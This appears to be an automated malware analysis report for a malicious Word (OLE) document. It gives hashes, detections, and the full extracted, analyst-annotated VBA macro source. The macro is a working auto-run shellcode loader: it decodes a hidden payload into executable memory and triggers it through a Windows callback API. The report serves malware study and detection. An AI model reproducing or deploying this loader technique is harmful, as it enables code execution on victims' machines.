Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b8cc4c79909eb24e…

MALICIOUS

Office (OLE)

157.0 KB Created: 2016-11-15 13:58:00 Authoring application: Microsoft Office Word First seen: 2016-12-03
MD5: 5fc0f0f8481b7bea1f7b09577f22fc39 SHA-1: d6f83f53fb1a0288f8afa0acd390bd2e3b4d03d8 SHA-256: b8cc4c79909eb24e24e7a08ba95084668ff1f58ce3774a1b1d47470543ed3487
110 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The critical ClamAV heuristic identifies the file as 'Doc.Dropper.Agent-1830698', indicating it is a dropper. The presence of VBA macros, specifically a Document_Open macro, suggests an attempt to execute malicious code automatically when the document is opened. The macro's obfuscated nature and its references to APIs such as VirtualAlloc point towards payload execution, likely involving the download of additional malware.

Heuristics 5

  • ClamAV: Doc.Dropper.Agent-1830698 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-1830698
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Document_Open()
    Dim alight As Variant
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL
    • http://ns.adobe.com/xap/1.0/ — In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# — In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ — In document text (OLE body)
    • http://purl.org/dc/elements/1.1/ — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# — In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12006 bytes
SHA-256: fc81393b1893b6f255a5b78c224c75eee340a4a24fe678ea69374211fb808a06
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-run entry point: Word executes this when the document is opened
' (the OLE_VBA_DOCOPEN finding above). The only statement that matters is the
' bare call to immodest, which stages and triggers the payload; everything
' else in this procedure is padding.
Private Sub Document_Open()
Dim alight As Variant
Dim actitis As Variant
memorialist = "canker"
' Bare-name statement: calls Sub immodest (the loader) in this module.
immodest
' Junk loop: runs three times and touches only unused globals.
hemangioma = 4
While hemangioma <> 7
hemangioma = hemangioma + 1
torpedinidae = torpedinidae And 162
ghee = engross
Wend
End Sub
' Copies the decoded payload into freshly allocated executable memory and
' returns that memory's address. The API names are aliases declared in module
' bargainpriced: mesocricetus = RtlMoveMemory, paganism = VirtualAllocEx.
' boehmenism: Variant holding the decoded payload (the String returned by
'   bargainpriced.conjugation, built from a Byte array).
' Returns: address (as Long) of the allocated buffer now holding 6183 bytes
'   of payload.
' NOTE(review): every destination here is a 4-byte Long, so the pointers are
' truncated on 64-bit Office; this looks built for 32-bit Office — confirm.
Function salvo(boehmenism)
Dim accipere As Long
Dim ctenizidae As Integer
Dim immense As Long
' RtlMoveMemory(immense, VarPtr(boehmenism) + 8, 4): reads the 4-byte data
' field at offset 8 of the VARIANT structure, i.e. the pointer to the
' payload's character data, into immense.
mesocricetus immense, VarPtr(boehmenism) + 8, 4
Dim saracen As String
Dim donation As Integer
Dim degrading As Long
auspicial = 0
' Obfuscated constants: aerodynamics = -1 (the current-process pseudo-handle),
' reasoned = 0 (let the OS pick the address).
aerodynamics = 57 - 56 - 2
reasoned = 13 - 65 + 52
gewonnen = Round(473.95)

gewonnen = gewonnen \ 74

' 4096 = MEM_COMMIT.
mare = 4096
' VirtualAllocEx(-1, 0, 9915, MEM_COMMIT, 64): 64 = PAGE_EXECUTE_READWRITE,
' so this is an RWX allocation (9915 bytes, more than the 6183 copied below).
' The declared first two parameters are ByRef; the call forces ByVal.
bankruptcy = paganism(ByVal aerodynamics, ByVal reasoned, 9915, mare, 64)
gewonnen = torpedinidae * 4

' bankruptcy is an undeclared Variant holding the returned Long; the 4 bytes
' at offset 8 of that VARIANT are its value, i.e. the allocation address.
mesocricetus degrading, VarPtr(bankruptcy) + 8, 4
gewonnen = gewonnen \ 150

' RtlMoveMemory(degrading, immense, 6183): copy the decoded payload into the
' RWX buffer. 6183 = 8244 base64 characters * 3 / 4 (see conjugation).
mesocricetus ByVal degrading, immense, 6183
' Dead branch: 57 - 76 = -19 is never 18, so the Then side always runs and
' only builds the unused string "uncommunicative".
electrophoresis = 57
taipei = 76
If (electrophoresis - taipei) <> 18 Then
electrophoresis = "go" & "lden"
ghee = "tubed"
gewonnen = torpedinidae Or 210
sociolinguistics = Mid("subtestuncomlignified", 8, 5) & LCase$("municaTi") & Replace("vcoherent", "coherent", "e")
Else
ghee = "apology"
taipei = 76
End If

salvo = degrading
End Function
' Loader. Reads the encoded payload from a control on the UserForm module
' "unflattering", base64-decodes it (bargainpriced.conjugation), places it in
' executable memory (salvo) and transfers control to it through a Win32
' callback API (ohmmeter = EnumTimeFormatsW in bargainpriced).
' Nothing in this listing performs a network request; what the staged
' payload itself does cannot be determined from the macro source alone.
Sub immodest()
Dim abba As Variant
Dim apodemus As String
' The encoded payload lives in the form, not in this listing: it is the last
' 8244 characters of the selected item's Name property. witness is presumed
' to be a control exposing SelectedItem/Name (e.g. a TabStrip or MultiPage);
' the form's design is not part of the extracted module — confirm.
Set mountains = unflattering.witness.SelectedItem
sectional = mountains.Name
' 67 + 8177 = 8244 characters = 2061 base64 quads.
heliograph = 67 + 8177
antioxidant = Right(sectional, heliograph)
' Decoded payload as a String built from a Byte array (see conjugation).
depicture = bargainpriced.conjugation(antioxidant)
' Padding loop; the strings it builds are never used.
For informative = 49 To 66
buxus = 66
gewonnen = gewonnen * 3
intoxicate = LCase$("AVE") & Mid("unvaluedrsenetitian", 9, 5) & LCase$("SS")
intoxicate = LCase$("lE") & "avings"
Next informative

lambaste = "bras"
' Architecture-dependent junk declarations (cebu is a Type in bargainpriced);
' nothing here feeds the payload path.
#If VBA6 And Win64 Then
Dim mysophobic As Variant
Dim eclaircissement As cebu
Dim alula As LongPtr
eclaircissement.start = 29 - 29
Dim pleurotus As String
#Else
Dim despise As Integer
eclaircissement = 0
Dim bouncing As Long
Dim alula As Long
#End If
indistinct = 0
atropa = "snu" & "ffcolored"
sacred = 100 - 44 - 15 + 4055
' Padding loop.
For allochthonous = 35 To 57
impugnable = 57
engross = "bowiea"
pinto = Replace("sebioluminescent", "bioluminescent", "lf") & "lessness"
pinto = "str" & "uctur" & Replace("ainclemency", "inclemency", "l")
Next allochthonous

unagitated = "subpanation"
kwack = "fluoroboride"
' Padding loop.
For alectryomancy = 48 To 76
ichthyolatry = 76
gewonnen = gewonnen - 369
banteng = "ph" & "onetic"
banteng = Mid("passeridaecojeffersonian", 11, 2) & "unter" & Mid("mpjumperunit", 3, 6)
Next alectryomancy

anecdotic = depicture
lycanthropy = "nonsurgical"
' salvo copies the decoded bytes into an RWX buffer and returns its address.
alula = salvo(anecdotic)
addresses = Mid("backswimmerwjdigitalis", 12, 2)
meekly = "bronze"
' Entry offset into the buffer, chosen per architecture:
' Win64: 62 + 6 + 70 + 1142 = 1280; Win32: (17 + 32 + 457) + 3171 = 3677.
#If VBA6 And Win64 Then
Dim allegory As String
dishonest = "causans"
moraceous = "agaricaceae"
arrowy = 62 + 6 + 70 + 1142
#ElseIf Win32 Then
cornishman = "comptrollership"
slash = "ca" & "ntab" & Mid("scopoliarigianclumsy", 9, 6)
bandurria = 17 + 32 + 457
arrowy = bandurria + 3171

#End If
Dim myxine As String
Dim heliport As Variant
Dim sabbath As Long
' 92 + 86 - 101 + 1971 = 2048 (LOCALE_SYSTEM_DEFAULT), the API's Locale argument.
sabbath = 92 + 86 - 101 + 1971
Dim astound As Long
' Buffer address + entry offset = the "callback" address handed to the API.
astound = alula + arrowy
Dim inconsequence As Long
inconsequence = 0
' ohmmeter is EnumTimeFormatsW. Its first parameter is a callback pointer
' that the API invokes for each time format, so this call is what actually
' transfers execution to the staged buffer. Detection note: a locale
' enumeration API receiving an address inside a fresh RWX allocation as its
' callback is the observable trigger.
zonam = ohmmeter(astound, sabbath, inconsequence)
' Padding loop.
For cocaine = 3 To 74
amalgamative = 74
ghee = "melody"
aversation = LCase$("bu") & "shman"
aversation = Replace("acivility", "civility", "n") & "alogue"
Next cocaine

End Sub

' Not part of the loader: a Word table-editing macro that deletes the selected
' cells, shifting the remaining ones up or left. It reads like a stock
' documentation example dropped in to make the module look legitimate; it is
' never called from the visible code.
Sub num()
    With Selection
        ' Reject a selection spanning more than one row and one column.
        ' End halts all running macros, not just this one.
        If .Columns.Count > 1 And .Rows.Count > 1 Then
            MsgBox "Please select cells in only one row " _
                & "or only one column."
            End
        Else
            ' Several cells in one row shift up; several in one column
            ' (or a single cell) shift left.
            If .Cells.Count > 1 Then
                If .Columns.Count > 1 Then
                    .Cells.Delete ShiftCells:=wdDeleteCellsShiftUp
                Else
                    .Cells.Delete ShiftCells:=wdDeleteCellsShiftLeft
                End If
            Else
                .Cells.Delete ShiftCells:=wdDeleteCellsShiftLeft
            End If
        End If
    End With
End Sub



Attribute VB_Name = "bargainpriced"
' Module "bargainpriced": Win32 imports hidden behind random aliases; the
' song-lyric comments between the declarations are padding. Only three of the
' eight imports are referenced by the visible code, and only those three keep
' the same alias in both the Win64 and the 32-bit branch:
'   mesocricetus = RtlMoveMemory    (ntdll.dll, not kernel32 — memory copy, salvo)
'   paganism     = VirtualAllocEx   (RWX allocation, salvo)
'   ohmmeter     = EnumTimeFormatsW (callback API that runs the buffer, immodest)
' EndPaint, OpenClipboard, Sleep, SetParent and GetUpdateRect are declared but
' never called here; presumably decoys (the form module shows no code in this
' listing — confirm).
'Love's an elusive charm and it can be painful
#If VBA6 And Win64 Then
'п»їLove can be so strange
' Type used only by a junk Dim in immodest.
Public Type cebu
'No you're never gonna crack
start As LongPtr
'You can keep it pure on the inside
End Type
'And you know what you believe to be right
Public Declare PtrSafe Function hoop Lib "user32" Alias "EndPaint" (flatten As LongPtr,education As LongPtr) As LongPtr
'You can keep it pure on the inside
Public Declare PtrSafe Function workboard Lib "user32" Alias "OpenClipboard" (garderobe As LongPtr) As Boolean
'Cause life is so short there's no time to waste it
Public Declare PtrSafe Function nube Lib "kernel32.dll" Alias "Sleep" (bone As LongPtr)
'To late for solutions to solve in the setting sun
' Used: memory copy (destination ByRef, source ByVal, length).
Public  Declare PtrSafe Sub mesocricetus Lib "ntdll.dll" Alias "RtlMoveMemory" (busbar As Any, ByVal accompanist As Any, ByVal buckleya As LongPtr)
'To understand this crazy world
Public Declare PtrSafe Function arbitrage Lib "user32" Alias "SetParent" (ByVal impetrate As LongPtr, ByVal tc As LongPtr,dunderhead As LongPtr) As LongPtr
'To understand this crazy world
Public Declare PtrSafe Function barroom Lib "user32" Alias "GetUpdateRect" (halfbeak As LongPtr, imperator As LongPtr,cog As LongPtr) As Boolean
'So when nothing seems too certain or safe
' Used: the payload trigger (first argument is treated as a callback pointer).
Public  Declare PtrSafe Function ohmmeter Lib "kernel32.dll" Alias "EnumTimeFormatsW" (ByVal nonpasserine As Any, ByVal alumnus As Any, ByVal rhamnus As Any) As LongPtr
'So when nothing seems too certain or safe
' Used: allocation; salvo passes (-1, 0, 9915, MEM_COMMIT, PAGE_EXECUTE_READWRITE).
Public  Declare PtrSafe Function paganism Lib "kernel32.dll" Alias "VirtualAllocEx" (cotenancy As LongPtr, africanamerican As LongPtr, ByVal lollipop As LongPtr, ByVal assisted As LongPtr, ByVal base As LongPtr) As LongPtr
'So when nothing seems too certain or safe

'So when nothing seems too certain or safe
#Else
'So when nothing seems too certain or safe
' 32-bit branch: same three working aliases, different decoy aliases.
Public Declare Function ohmmeter Lib "kernel32.dll" Alias "EnumTimeFormatsW" (ByVal cryptobiotic As Any, ByVal temerarious As Any, ByVal furlike As Any) As Long
'So when nothing seems too certain or safe
Public Declare Function ladyofthenight Lib "user32" Alias "GetUpdateRect" (disclaimer As Long, pliers As Long, duck As Long) As Boolean
'So when nothing seems too certain or safe
Public Declare Function foxy Lib "user32" Alias "EndPaint" (chilblain As Long, anthericum As Long) As Long
'So when nothing seems too certain or safe
Public Declare Sub mesocricetus Lib "ntdll.dll" Alias "RtlMoveMemory" (estranged As Any, ByVal exhaled As Any, ByVal genial As Long)
'So when nothing seems too certain or safe
Public Declare Function prohibitionist Lib "user32" Alias "SetParent" (ByVal pawky As Long, ByVal motazilite As Long, phantom As Long) As Long
'No you're never gonna crack
Public Declare Function overrighteous Lib "kernel32.dll" Alias "Sleep" (fluster As Long)
'So when nothing seems too certain or safe
Public Declare Function paganism Lib "kernel32.dll" Alias "VirtualAllocEx" (amore As Long, chieftaincy As Long, ByVal pedantry As Long, ByVal unestablished As Long, ByVal neglige As Long) As Long
'Run my baby run my baby run
Public Declare Function gullet Lib "user32" Alias "OpenClipboard" (angular As Long) As Boolean
'So run my baby run my baby run

'No you're never gonna crack
#End If
'No you're never gonna crack
' Thin wrapper around AscW: the Unicode code of the first character of gift.
' Used by conjugation to turn each input character into a byte.
Function runup(gift)
runup = AscW(gift)
End Function
' Base64 decoder with one twist: every input character code is first raised
' by 8 before the standard alphabet table is applied (presumably the stored
' text was produced by subtracting 8 from each base64 character — confirm
' against the form data). No '=' handling: the zero-initialised table maps
' any character outside the alphabet to 0.
' diffusive: the 8244-character encoded string (Right(..., 8244) in immodest).
' Returns: a String carrying the decoded bytes (VBA allows a Byte array to be
'   assigned to a String); 6183 bytes (8244 * 3 / 4) are written into a
'   6966-byte output array, so the tail of the result is zero.
' The helpers draw (And), slowconsuming (\) and antipoison (*) are one-line
' wrappers defined below; the arithmetic is obfuscated constant building.
Function conjugation(diffusive) As String
Dim travesty As Byte

Dim counts As Long
Dim shakeout As Long
' Weight tables for the three high sextets of a 24-bit quad:
' constringe = i*64, mutal = i*4096, twentyeight = i*262144.
Dim constringe(63) As Long
Dim brooklime As Integer
Dim mutal(63) As Long
backbend = engross

Dim twentyeight(63) As Long
Dim levity As String
Dim gumption As Long
Dim bugloss() As Byte
' Reverse alphabet table, indexed by character code -> 6-bit value.
Dim cosigner(255) As Byte
Dim ghyll As String

Dim cruciferous As String

Dim pentahedron As Long
' Output buffer.
Dim leisureiy(6965) As Byte
engross = backbend

Dim pianino As Variant

' Obfuscated constants:
'   arthroscopy = 16711680 (&HFF0000)   barbarian = 256   gracefully = 255
'   spermatophyta = 64                  belted = 65536    stung = 262144 (2^18)
'   fuliginous, nuptial, cutlery are never used.
arthroscopy = 73 + 16711607
barbarian = 33 - 6 - 109 + 338
gracefully = 94 + 24 - 53 + 190
spermatophyta = 126 + 14 + 11 - 87
fuliginous = 16515072
nuptial = 4032
belted = 87 - 71 + 65520
cutlery = 258048
stung = 110 - 119 + 262153
Dim acclamation As Variant

Dim mutilate As Variant

' bumboat = 65280 (&HFF00), visavis = 4096 (2^12).
bumboat = 65280
visavis = 4096
potboiler = 63
Dim bushwhacker As String
' One byte per input character (8244 characters).
Dim botryoid(8243) As Byte
' Loop bounds 0 .. 8243.
hagiography = 49 + 90 - 139
enwrap = 128 + 8115
For auburn = hagiography To enwrap
marvelous = 1
aposiopetic = Mid$(diffusive, auburn + 1, marvelous)
' Padding string builds ("Ingested", "infinitival", "cashmere"), unused.
diet = LCase$("In") & "gest" & Replace("esait", "sait", "d")
brooch = "in" & "finitival"
testiness = "cashmere"
' runup = AscW.
latria = runup(aposiopetic)
botryoid(auburn) = latria
Next
Dim nobody As Long
' Padding loop.
diver = 8
While diver <> 11
diver = diver + 1
torpedinidae = Round(361.1195)
gewonnen = torpedinidae \ 184
Wend

neurology = 8243
decolletage = 35
' Undo the alphabet shift: add 8 to every character code.
For cherubim = 0 To neurology
botryoid(cherubim) = botryoid(cherubim) + 8
Next cherubim
' Padding loop.
For hasten = 45 To 51
saline = 51
backbend = ghee
brooding = "si" & "mon"
brooding = "pro" & "hibiti" & "vely"
Next hasten

brooklime = 0
fist = 122
' 67 + 188 = 255: build the standard base64 reverse table
' (A-Z -> 0..25, a-z -> 26..51, 0-9 -> 52..61, '+' -> 62, '/' -> 63).
boundless = 67 + 188
For pentahedron = 0 To boundless
If (pentahedron >= 65) And (pentahedron <= 90) Then
cosigner(pentahedron) = pentahedron - 65
ElseIf (pentahedron >= 97) And (pentahedron <= 122) Then
cosigner(pentahedron) = pentahedron - 71
ElseIf (pentahedron >= 48) And (pentahedron <= 57) Then
cosigner(pentahedron) = pentahedron + 4
ElseIf pentahedron = 43 Then
cosigner(pentahedron) = 62
ElseIf pentahedron = 47 Then
cosigner(pentahedron) = 63
End If
Next pentahedron
' Fill the weight tables (antipoison is multiplication).
For pentahedron = 0 To 63
constringe(pentahedron) = antipoison(pentahedron, spermatophyta)
mutal(pentahedron) = antipoison(pentahedron, visavis)
twentyeight(pentahedron) = antipoison(pentahedron, stung)
Next pentahedron
' Padding loop.
archon = 6
While archon <> 10
archon = archon + 1
torpedinidae = Abs(305.933)
gewonnen = Fix(222.1423)
Wend

bugloss = botryoid
koine = 30 + 28 - 120 + 66
' Padding loop.
For brushy = 6 To 53
dendrobium = 53
gewonnen = torpedinidae * 1
pelican = Replace("macknowledgment", "acknowledgment", "e") & LCase$("tEorOlOgy")
pelican = LCase$("Bi") & Mid("cobolsulcousexpressive", 6, 7)
Next brushy

' educt = 3 (index of the fourth character in a quad), mute = 2.
educt = 80 - 67 - 10
engross = "anthriscus"

backbend = "drynaria"

calibration = educt + 1
mute = 50 - 92 + 44
' Main decode loop: one quad of four characters -> three bytes. counts
' advances by 4 per iteration (explicit + 3 plus the loop's own + 1).
For counts = 0 To neurology
alkylbenzenesulfonate = bugloss(counts)
discreditable = bugloss(counts + 2)
' 24-bit group: c0*2^18 + c1*2^12 + c2*2^6 + c3.
gumption = twentyeight(cosigner(alkylbenzenesulfonate)) _
 + mutal(cosigner(bugloss(counts + 1))) + constringe(cosigner(discreditable)) + cosigner(bugloss(counts + educt))
' Byte 0 = (group And &HFF0000) \ 65536.
pentahedron = draw(gumption, arthroscopy)
leisureiy(shakeout) = slowconsuming(pentahedron, belted)
' Byte 1 = (group And &HFF00) \ 256.
pentahedron = draw(gumption, bumboat)
leisureiy(shakeout + 1) = slowconsuming(pentahedron, barbarian)
' Byte 2 = group And &HFF.
leisureiy(shakeout + mute) = draw(gumption, gracefully)
shakeout = shakeout + mute + 1
counts = counts + 3
Next
' Byte array -> String; consumed by salvo through a raw pointer read.
conjugation = leisureiy
End Function

' Multiplication wrapper; used by conjugation to fill its weight tables.
Function antipoison(strawbail, periphrase)
antipoison = strawbail * periphrase
End Function
' Not part of the loader: a Word "select a table" snippet used as padding and
' never invoked from the visible code.
' NOTE(review): tempRange is never declared or assigned — tempTable on the
' line above is the evident intent. This code does not use Option Explicit
' (undeclared names are used throughout), so tempRange is an Empty Variant
' and the member call raises a run-time error. Harmless for the loader.
Sub tableSel()
    Dim tempTable
    Documents("Log.doc").Tables(1).Select
    Set tempTable = Selection.Tables(1).Range
    tempRange.Tables(2).Select
End Sub

' Bitwise And wrapper; conjugation uses it to mask one byte out of a 24-bit group.
Function draw(cambodia, agamid)
draw = cambodia And agamid
End Function
' Integer-division (\) wrapper; conjugation uses it to shift a masked byte down.
Function slowconsuming(titus, analgesia)
slowconsuming = titus \ analgesia
End Function


Attribute VB_Name = "unflattering"
Attribute VB_Base = "0{FB913D05-D54F-43AE-B223-61BE15D5BE39}{8E83D3FF-7B80-4FEA-A1FA-EA1D5AC9E624}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False